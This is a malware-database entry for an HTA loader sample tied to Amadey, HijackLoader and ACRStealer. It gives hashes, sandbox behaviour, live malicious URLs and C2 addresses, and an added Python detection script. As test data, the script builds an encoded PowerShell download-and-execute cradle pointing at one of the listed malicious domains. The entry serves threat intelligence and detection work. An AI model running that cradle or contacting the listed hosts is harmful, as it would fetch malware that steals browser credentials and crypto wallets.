MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 eddbd2a74633b9a498dbb8c928eabd8960b9d51b6e945f35269ea65e3ba86ae0. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Amadey
Vendor detections: 10

SHA256 hash: eddbd2a74633b9a498dbb8c928eabd8960b9d51b6e945f35269ea65e3ba86ae0
SHA3-384 hash: b017da3dbbc38e4fd0161d2c9b8954c559611792ae322492cbf724c93bc688afea5407521c10b4dd1a0055bb6f50bb3a
SHA1 hash: 18bffddc274d5cc0e1a04b4e125827eb20e19bd5
MD5 hash: 3038071606faa9813689c156303c9ad2
humanhash: comet-shade-may-happy
File name: nui.gam.hta
Signature: Amadey
File size: 337 bytes
First seen: 2025-10-17 21:17:20 UTC
Last seen: Never
File type: HTML Application (hta)
MIME type: text/html
ssdeep: 6:qFzLVYrXkEqrnw4+f8MHoUSRXcM2xn9FAwR/4Nhdx434Qb:kqUEqrnw4+FH/SRXsR9T4Nbx4IQb
TLSH: T102E07D04ECB5C898157638869FE7FB0C20429157100BD9903F8CEAA28FF2917898E5ED
Magika: html
Reporter: aachum
Tags: 37-27-45-144 827ad8 ACRStealer Amadey ClickFix HIjackLoader hta


iamaachum
https://96d23b93.verify-consent-to-continue.pages.dev/ => http://162.252.198.122/nui.gam

ACRStealer C2: 37.27.45.144

Intelligence


File Origin
# of uploads: 1
# of downloads: 259
Origin country: ES

Vendor Threat Intelligence

Verdict: Malicious
Score: 92.5%
Tags: shellcode spawn shell

Result
Verdict: Malicious
File Type: HTA File - Malicious

Behaviour: BlacklistAPI detected

Verdict: Malicious
File Type: html
First seen: 2025-10-17T18:35:00Z UTC
Last seen: 2025-10-17T19:10:00Z UTC
Hits: ~10
Detections: HEUR:Trojan.Script.Generic

Result
Threat name: ACR Stealer, HijackLoader
Detection: malicious
Classification: troj.spyw.expl.evad
Score: 100 / 100
Signature
Allocates memory in foreign processes
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Found malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Modifies the context of a thread in another process (thread injection)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
PowerShell case anomaly found
Powershell uses Background Intelligent Transfer Service (BITS)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: Powershell Download and Execute IEX
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Sigma detected: Suspicious PowerShell Invocations - Specific - PowerShell Module
Suricata IDS alerts for network traffic
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
System process connects to network (likely due to code injection or exploit)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected ACR Stealer
Yara detected HijackLoader
Yara detected Powershell download and execute
Yara detected Python Injector
Behaviour
Behavior Graph (Joe Sandbox analysis ID 1797412; sample nui.gam.hta; start date 17/10/2025; architecture WINDOWS; score 100). The graph image is not reproduced here; the process tree it shows, with the network contacts, dropped files and signatures attached to each node, is:

mshta.exe
  signature: PowerShell case anomaly found
  powershell.exe
    network: valeforge.space (172.67.221.10:443, CLOUDFLARENET, United States)
    signatures: Suspicious powershell command line found; Found many strings related to Crypto-Wallets (likely being stolen); Suspicious execution chain found; 2 other signatures
    Setup.exe
      dropped: C:\Users\user\...\MicrosoftEdgeUpdate.exe (PE32); C:\Users\user\AppData\Local\...\41032F2.tmp (PE32); C:\ProgramData\9372766\SQLite.Interop.dll (PE32+); C:\ProgramData\...\CCleanerReactivator.dll (PE32+)
      signatures: Found hidden mapped module (file has been removed from disk); Switches to a custom stack to bypass stack traces; Found direct / indirect Syscall (likely to bypass EDR)
      MicrosoftEdgeUpdate.exe
        network: 85.209.128.128:80 (VELIANET-AS velianet Internetdienste GmbH, Netherlands); 37.27.45.144:443 (UNINETAZ, Iran)
        signatures: Found many strings related to Crypto-Wallets (likely being stolen); Bypasses PowerShell execution policy; Contains functionality to inject code into remote processes; 6 other signatures
        rundll32.exe
          network: wgd.slideshowimprison.digital (104.21.8.191:443, CLOUDFLARENET, United States); mi.limpingbronco.com (172.67.168.12:80, CLOUDFLARENET, United States)
          dropped: C:\Users\...\eG7gpv3PDKvcrdMkRs3nwTsoc.exe (PE32+); C:\Users\...\BUPkZ2RNQywriA5YzbTSiQcl.exe (PE32+); C:\Users\...\eG7gpv3PDKvcrdMkRs3nwTsoc[1] (PE32+); C:\Users\user\...\BUPkZ2RNQywriA5YzbTSiQcl[1] (PE32+)
          signatures: System process connects to network (likely due to code injection or exploit); Creates multiple autostart registry keys
          BUPkZ2RNQywriA5YzbTSiQcl.exe
            dropped: C:\Users\user\AppData\Local\...\_is6EFB.exe (PE32+)
            signature: Multi AV Scanner detection for dropped file
            _is6EFB.exe
              dropped: C:\Users\user\AppData\...\vcruntime140.dll (PE32); C:\Users\user\AppData\Local\...\sqlite3.dll (PE32); C:\Users\user\AppData\Local\...\select.pyd (PE32); 13 other malicious files
              signatures: Multi AV Scanner detection for dropped file; Found pyInstaller with non standard icon
              pythonw.exe
                network: 91.242.163.152 (OOO-SYSMEDIA-AS, Russian Federation); a8a00b7a27dd309f6.awsglobalaccelerator.com (3.33.196.84, AMAZONEXPANSIONGB, United States); 2 other IPs or domains
        powershell.exe
          signatures: Powershell uses Background Intelligent Transfer Service (BITS); Loading BitLocker PowerShell Module
          conhost.exe
        powershell.exe
          network: 87.120.219.26:80 (NET1-AS, Bulgaria)
          conhost.exe
        9 other processes (which in turn start three WerFault.exe instances and 9 further processes)
    powershell.exe
      conhost.exe
    powershell.exe
      conhost.exe
    conhost.exe
elevation_service.exe

Root-level network entries: wgd.slideshowimprison.digital; mi.limpingbronco.com; 7 other IPs or domains. Root-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 17 other signatures.
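The chain the sandbox records (mshta.exe spawning powershell.exe, an encoded download-and-execute cradle, a rundll32.exe started without arguments, and beacons to the C2 address the reporter lists) maps directly onto the Sigma detection names above. The following Python is an added example, not part of this MalwareBazaar entry and not code from Joe Sandbox or the Sigma project: it implements four of those checks plus an indicator match over constructed Sysmon-style events. The IPs and domains are the ones recorded in this entry; the command lines, the stager text, the URL path, the dropper's directory and the two benign control events are assumptions made for the example.

```python
"""Sigma-style checks for the mshta -> PowerShell -> rundll32 chain recorded in this entry (added example)."""
import base64
import re
from dataclasses import dataclass

# Hosts recorded in this entry (reporter comment, sandbox graph, dropper URL).
NETWORK_IOCS = {
    "37.27.45.144",      # ACRStealer C2 (reporter comment)
    "87.120.219.26",     # dropper extraction host
    "162.252.198.122",   # second-stage host in the reporter's URL chain
    "85.209.128.128", "91.242.163.152",
    "valeforge.space", "wgd.slideshowimprison.digital", "mi.limpingbronco.com",
}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
SHELL_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe", "rundll32.exe"}
CRADLE_RE = re.compile(
    r"invoke-expression|\biex\b|downloadstring|downloadfile|invoke-webrequest|\biwr\b"
    r"|start-bitstransfer|net\.webclient", re.IGNORECASE)
ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
NORMAL_CASE = {"powershell", "Powershell", "PowerShell", "POWERSHELL"}


@dataclass(frozen=True)
class Finding:
    rule: str
    process_id: int
    detail: str


def basename(path: str) -> str:
    return path.strip('"').replace("\\", "/").rsplit("/", 1)[-1]


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE script behind -EncodedCommand, or None if absent or malformed."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None


def has_case_anomaly(cmdline: str) -> bool:
    """'PowerShell case anomaly': the invoked binary is powershell in odd casing (poWerShell)."""
    tokens = cmdline.split()
    stem = re.sub(r"\.exe$", "", basename(tokens[0]), flags=re.IGNORECASE) if tokens else ""
    return stem.lower() == "powershell" and stem not in NORMAL_CASE


def check_process(ev: dict) -> list:
    """Checks over one Sysmon EID 1 style event; findings are emitted in this order."""
    pid, cmd = ev["ProcessId"], ev.get("CommandLine", "")
    parent, image = basename(ev["ParentImage"]).lower(), basename(ev["Image"]).lower()
    out = []
    if parent in SCRIPT_HOSTS and image in SHELL_CHILDREN:
        out.append(Finding("Suspicious MSHTA Child Process", pid, f"{parent} -> {image}"))
    decoded = decode_encoded_command(cmd)
    if decoded is not None and CRADLE_RE.search(decoded):
        out.append(Finding("PowerShell Base64 Encoded IEX Cmdlet", pid, decoded.strip()))
    elif CRADLE_RE.search(cmd):  # the same cradle passed in clear text
        out.append(Finding("PowerShell Download and Execution Cradles", pid, cmd))
    if has_case_anomaly(cmd):
        out.append(Finding("PowerShell case anomaly found", pid, cmd.split()[0]))
    if image == "rundll32.exe" and len(cmd.split(None, 1)) < 2:
        out.append(Finding("Rundll32 Execution Without CommandLine Parameters", pid, cmd))
    return out


def check_network(ev: dict) -> list:
    """Flag a Sysmon EID 3 style event whose destination IP or hostname is a listed indicator."""
    hit = {ev.get("DestinationIp", ""), ev.get("DestinationHostname", "")} & NETWORK_IOCS
    return [Finding("IOC match: known C2 or dropper host", ev["ProcessId"],
                    f"{basename(ev['Image'])} -> {h}:{ev.get('DestinationPort')}") for h in sorted(hit)]


CHECKS = {1: check_process, 3: check_network}


def analyse(events: list) -> list:
    return [f for ev in events for f in CHECKS.get(ev["EventID"], lambda _ev: [])(ev)]


# Constructed telemetry: stager text, URL path and the Temp directory are invented (the entry
# elides the dropper's directory); pid 900 events and 192.0.2.10 / example.invalid are benign controls.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('https://valeforge.space/')"
ENC = base64.b64encode(STAGER.encode("utf-16-le")).decode()
DROPPER = r"C:\Users\user\AppData\Local\Temp\MicrosoftEdgeUpdate.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessId": 18, "ParentImage": r"C:\Windows\System32\mshta.exe", "Image": PS,
     "CommandLine": f"poWerShell.exe -nop -w hidden -ep bypass -enc {ENC}"},
    {"EventID": 1, "ProcessId": 40, "ParentImage": DROPPER,
     "Image": r"C:\Windows\System32\rundll32.exe", "CommandLine": "rundll32.exe"},
    {"EventID": 3, "ProcessId": 32, "Image": DROPPER, "DestinationIp": "37.27.45.144",
     "DestinationPort": 443, "DestinationHostname": ""},
    {"EventID": 1, "ProcessId": 900, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell.exe -File C:\scripts\backup.ps1"},
    {"EventID": 3, "ProcessId": 900, "Image": PS, "DestinationIp": "192.0.2.10",
     "DestinationPort": 443, "DestinationHostname": "example.invalid"},
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.process_id}: {f.detail[:70]}")
```

The encoded-command check decodes the payload before matching, because the cradle keywords never appear in the raw command line of an `-enc` invocation; the clear-text branch exists so a cradle passed with `-Command` is still caught. The IOC set is only as good as the entry it was copied from, so treat a match on the Cloudflare-fronted domains as a lead rather than proof, and refresh the list when the entry is updated.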
Verdict: inconclusive
YARA: 2 match(es)
Tags: Html

Threat name: Win32.Trojan.Egairtigado
Status: Malicious
First seen: 2025-10-17 21:18:32 UTC
File Type: Text (HTML)
Extracted files: 1
AV detection: 7 of 24 (29.17%)
Threat level: 5/5

Result
Malware family: hijackloader
Score: 10/10
Tags: family:hijackloader discovery execution loader spyware stealer
Behaviour:
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
System Location Discovery: System Language Discovery
Suspicious use of SetThreadContext
Accesses cryptocurrency files/wallets, possible credential harvesting
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Badlisted process makes network request
Command and Scripting Interpreter: PowerShell
Detects HijackLoader (aka IDAT Loader)
HijackLoader
Hijackloader family
Malware Config:
Dropper Extraction: http://87.120.219.26/CCZT7wMNnD29ie
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method | Signature | File type | SHA256 hash
Web download | Amadey | HTML Application (hta) | eddbd2a74633b9a498dbb8c928eabd8960b9d51b6e945f35269ea65e3ba86ae0 (this sample)

Delivery method: Distributed via web download

Comments